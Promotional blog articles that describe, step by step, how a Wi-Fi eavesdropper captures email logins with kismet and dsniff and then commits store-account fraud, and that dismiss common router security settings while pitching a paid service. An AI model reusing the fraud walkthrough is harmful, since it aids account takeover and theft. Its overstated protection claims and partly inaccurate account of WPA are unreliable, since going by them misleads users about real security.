This is an Identity Theft example where a wireless hacker gains access to all your online accounts when you read your email over a wireless network.

Before you read any further, note that Wireless Personal Secure (Wifi Security Guy’s wireless security service) completely protects you and if you were using it the following would not happen to you. Click here to get this amazing protection or to learn more about it.

Setting: you use a wireless network (with or without a password) and check your email.

1. If this network has a password on it, the hacker has already used kismet/airsnort/aircrack to break it. More than likely this network doesn’t have a password on it - over 80% of them don’t.
2. Using kismet the hacker watchs you check your email. Kismet records every packet you send on the network.
3. Kismet records the email server you connected to, and the login name and password you used to get your email.
4. The hacker lets Kismet collect wifi packets for several hours, usually during the peak times this wifi network is in use. If this is a nearby hotel the hacker collects packets through the evening, if it’s a cafe or sandwich shop the hacker collects packets during lunch.
5. The hacker goes back home and runs dsniff on the capture files that kismet created. Dsniff dumps out all the servers and name/password combinations that kismet collected that day.
6. The hacker gets your server and login name/password and sets up his email client to now download all your email into a special folder. You are completely unaware he’s doing any of this.
7. The hacker monitors your email for several weeks, taking note of all the emails you get from online stores. The hacker compiles a list of all the stores that send you emails.
8. After several weeks of silently collecting your emails and making a list of where you have shopped the hacker is now ready to strike.
9. The hacker goes to each of your stores and has your password reset. To do this all he has to do is enter your email address and click “forgot password”. The online stores quickly oblige him by sending a new password to your email, which the hacker is receiving. The hacker takes not of each of the new passwords and quickly deletes those emails from you email server so you never see them.
10. The hacker then returns to each of the stores with the new passwords and places orders.
11. The hacker has the items sent to a different address, usually an apartment complex where UPS/FedEx just knock on the door and drop the package off.
12. One thing about online stores these days. They don’t charge your card until the merchandise is ready to ship. The hacker will have the packages overnighted (why not, it’s not his money…) which means your card is charged and he receives the goods the very next day.
13. Most people will never be aware they’ve even been charged until it’s too late - the hacker has long picked up the packages and can’t be caught.

Take note, all it took was the hacker gaining access to one thing (your email in this example). That’s how hackers work, they only need access to one thing, and from that they figure out how to gain access to other things. Another thing to note. The hacker never had to know your credit card numbers.

There are more complicated examples than this one, but this is certainly one of the easiest to understand.

Remember, everything you do on a wireless network can be seen by anyone else in the area, all it takes is one person deciding to record your activity and you can fall victim to identity theft very easily.

This article addresses a number of so-called security measures that “experts” say will help secure your wireless network from illegal access and Identity Theft. We list why these security measures don’t work and what you should really be doing to secure your wireless networks.

Before you read any further, note that Wireless Personal Secure (Wifi Security Guy’s wireless security service) completely protects you and if you were using it you wouldn’t have to worry about any of the following “security measures” (although you could do them if you wanted - even though as you’ll see, they don’t work). Click here to get this amazing protection or to learn more about it.

With Identity Theft being the fastest growing crime (according to the FBI), the growth of Identity Theft by wireless networks (millions reported in the past few years), and the ubiquity of wireless networking, there’s a lot of mis-information floating around out there where so-called “experts” give advice on how to secure wireless networks. A lot of the advice gives only a false-sense of security and since the average wifi user is not technically proficient enough to know what advice works and what doesn’t, we list the gambit of advice here, tell you if it doesn’t work (and why), and what action you should take in each case.

1. Change the default SSID.

The SSID (Service Set Identifier) gives the name of a particular wireless network. When someone comes over to your house and is going to use your wireless network you tell them the name (SSID) of the network and the password (I hope you have a password on it!!).

Every wireless access points come with a “factory default” SSID, usually the name of the manufacturer (LINKSYS, NETGEAR, D-LINK, etc), and it is good advice to change the SSID, but it doesn’t increase your security at all. Wireless networks with SSIDs that you generate are just as easy to break into as the SSIDs that came on the wireless access point from the factory.

Action: Change your SSID to something that’s more appropriate, but don’t think that changing the SSID adds any security to your network. Don’t change the SSID to your name, your address, your phone number, etc. - The problem with doing that is you let any passerby know exactly which wireless network they see in their scan is yours.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

2. Setting up MAC filtering.

Every network device (access point, laptop, computer, etc) has a MAC address (Media Access Control address). Without diving down into a lot of network theory, let me just say that your MAC address is hard coded into your computer’s wireless card. When you are using your home network you may have one IP address, and when you go to your local cafe you will more than likely get a different IP address. But your MAC never changed - it uniquely identifies you on the wireless network, no matter where you go.

MAC filtering is where you configure your wireless router to only allow certain MACs on the network, and it ignores all the rest. At first this may seem like a really good idea - a hacker driving by can’t use your network now, right? WRONG!

A hacker driving by will be using a sniffer tool like kismet, and kismet will tell the hacker all the MAC addresses in use on your wireless network (read the article to learn how). The hacker then sets his network card to use your MAC instead of the MAC that came on it. From that point forward your wireless router can’t tell the difference between your computer and the hacker’s computer.

MAC filtering is easily bypassed by a hacker. Additionally, every time a friend comes over who wants to legitimately use your wireless network you have to add their MAC to your filter list. It’s just not worth your time.

Action: None, MAC filtering adds no benefit to securing your network, it just adds an administrative burden to you every time a visitor drops by.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

3. Disable SSID broadcast.

Wireless routers ordinarily broadcast their SSID (name) every few seconds. Your computer uses that broadcast to know which wireless networks are in the area and join them (if you’ve configured that wireless network in the past, usually your computer will automatically join that network when it sees it). When you turn off the SSID broadcast your wireless router will not announce the network every few seconds. Now every time you want to connect to that wireless network, since it’s hidden, your computer won’t automatically connect to it. Instead you have to manually tell it “connect to my wireless network”. When you do that your computer broadcasts a message like “hey, is network XYZ around here?” The wireless router then says “yes, I’m here” and your computer then joins the network.

I hope you saw the flaw(s). A minor flaw is that you have to manually join the network any time you want to use it. A major flaw is the SSID is broadcast anyway, every time your computer goes to join. All a hacker has to do is wait around for your computer to join the network to pick up the SSID, then he can join the network too. And there are ways that he can “jam” your network so your computer “drops off” of the wireless network, then when you rejoin within a few minutes he’ll see the SSID. He bascially “forced” you into telling him the SSID.

Action: None. Not broadcasting the SSID only complicates your use of the wireless network without adding any security.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

4. Hard-code IP addresses instead of using DHCP.

DHCP stands for Dynamic Host Configuration Protocol. It’s a network administrator’s dream, and sometimes also their nightmare. Basically every computer on the network has to have an IP address. In the “old” days (pre DHCP) an administrator had to manually assign every computer on the network an IP address and make sure that none of the IP addresses overlapped (two computers with the same address). Most computers can’t handle having the same IP address that another computer has (more on this in a bit).

DHCP allows a computer to “ask” the network for an IP address whenever it connects. So when a computer joins the network it “asks” “hey, I’m new around here, can I get an IP address?” A DHCP server then says back “yes, you can have this IP: XXX.XXX.XXX.XXX”. This saves the network administrator the irritation of having to assign IPs to every computer, the DHCP server does it for him.

By turning off DHCP, the computers all have to be manually configured with different IP addresses. The idea behind turning off DHCP on a wireless network is that a hacker’s computer that connects to the network now won’t be automatically given an IP and then “can’t access the network”.

A hacker’s approach to this “problem” is to do similar to the MAC address hack. He just watches the network, sees what IPs are in use and then assigns himself one manually. If he uses a new IP but still can’t use the wireless network, he can assume it’s because the router also blocks any IPs that aren’t in it’s list, just like the MAC filtering. So he can do the same as he did for the MAC filtering hack, he just assigns the same MAC and IP of a computer that is on the network to his own computer. He can also setup his computer to not have a problem with there being another computer on the network with the same IP and now the network is wide-open to him.

Action: None. Turning off DHCP and doing IP filtering is just going to give you a headache every time a friend comes over, you have to walk him through all the steps of manually configuring his own IP as well as set up your router to now allow that IP to access the network. And all that trouble for a hacker to just side-step this “security” measure just isn’t worth it.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

5. WEP Encryption.

OK, this and WPA encryption are going to be the biggies. Everybody just assumes “oh, they work, they’ll secure me.” Bad news - the final analysis is they don’t ensure your security. WEP stands for Wired Equivalent Privacy - it’s name means “WEP is just as secured as using a wired network”. But don’t believe it’s name, it’s far from being as secured as a wired network.

I’m not going to get into all the complexities of explaining how WEP is insecure. Let me summarize with a layman’s-terms approach to WEP. With WEP you basically have a pre-shared key that everyone on the network uses. Whenever data is going to be sent on the wireless network the computer will take this pre-shared key and an IV (Initialization Vector) and use them to encrypt the data. The IV is basically an “offset” that tells which part of the pre-shared key is going to be used. The IV is constantly changed with every packet - the down side is the IV is sent along with the data! There are only 16 million possible IVs, once they are used up they begin to repeat. Once a hacker has enough IVs (either duplicates or “weak” IVs the pre-shared key can be “cryptographically calculated” in a matter of seconds. A busy network using WEP can be broken into within a matter of minutes.

Action: Turn on WEP if that’s all you have, better yet if that’s all you have - upgrade your router.

Additional Note: Since WEP doesn’t protect you from Identity Theft on your wireless network, you need the protection of a service like our Wireless Personal Secure.

6. WPA Encryption.

WPA (Wifi Protected Access) was created to answer the vulnerabilities in WEP. I’ll try to keep this as simple as possible, suffice it to say WPA has some strengths over WEP but in the end can still be broken and shouldn’t be trusted alone.

The full standard couldn’t be implemented with older network cards, and in their “rush” to secure wireless WPA was released without implementing all the security methods. WPA2 is the full implementation of the official WPA standard (802.11i). For the purposes of this article WPA will refer to both WPA and WPA2 from this point forward, we don’t want to muddy the waters with always pointing out their differences and we don’t think for the high-level view of WPA security it’s necessary.

WPA basically starts out as WEP with a larger pre-shared key and a larger IV. There are some other low-level differences between WEP and WPA, and they added EAP (Extensible Authentication Protocol) which allows different manufacturers and cryptography companies to add their own authentication methods to WPA. The problem the general public has with EAP is it takes an additional EAP server to secure the network, so the general public ends up using “standard” WPA.

WPA also suffers from one other weakness that WEP doesn’t have. When the router receives two packets that don’t pass integrity checks (like a hacker just blasting out packets that obviously don’t have the right pre-shared key). This is significant because it (a) causes the wireless router to shut the network down while it “resets” and (b) causes every client to re-join the wireless network. The weakest point of the WPA usage is when clients are connecting. This means a hacker can force a WPA network to continue sending the weakest packets until he’s able to break it.

Action: Use WPA2, and if possible invest in a more secured EAP-based solution.

Additional Note: Since WPA2 can be broken and leaves you vulnerable to Identity Theft on your wireless network, you need the protection of a service like our Wireless Personal Secure.

Hey, have some other security “advice” you’ve been given? Want to run it by the real experts and see if it’s good or not? Drop me a line and we’ll add it to this article!